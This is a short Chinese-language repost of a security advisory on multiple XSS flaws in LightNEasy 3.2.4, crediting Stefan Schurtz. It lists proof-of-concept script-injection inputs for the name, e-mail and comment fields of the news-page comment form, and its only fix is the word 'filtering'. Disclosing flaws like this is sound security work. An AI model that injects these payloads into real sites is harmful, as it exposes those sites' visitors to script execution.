LightNEasy 3.2.4多个xss缺陷及修复 - 网站安全 - 自学

标题: Multiple XSS vulnerabilities in LightNEasy 作者: Stefan Schurtz 原原本本: 3.2.4 开发者官网: http://www.lightneasy.org/

缺陷分析

LightNEasy 易于遭xss攻击

================== 技术日志: ==================

http://www.2cto.com /lightneasy/LightNEasy.php?page=news

//commentemail Your name: blah Your e-mail: '"</style></script><script>alert(0x000296)</script> Your comment: blah Code: 666

//commentmessage Your name: blah Your e-mail: blah (at) blah (dot) de [email concealed] Your comment: </textarea></td></tr><script>alert('XSS')</script> Code: 666

//commentname Your name: '"</style></script><script>alert('XSS')</script> Your e-mail: blah (at) blah (dot) de [email concealed] Your comment: blah Code: 666

========= 解决方案: ========= 过滤

声明：本文来自网络，不代表【好得很程序员自学网】立场，转载请注明出处：http://www.haodehen.cn/did11369

更新时间：2022-09-13 阅读：44次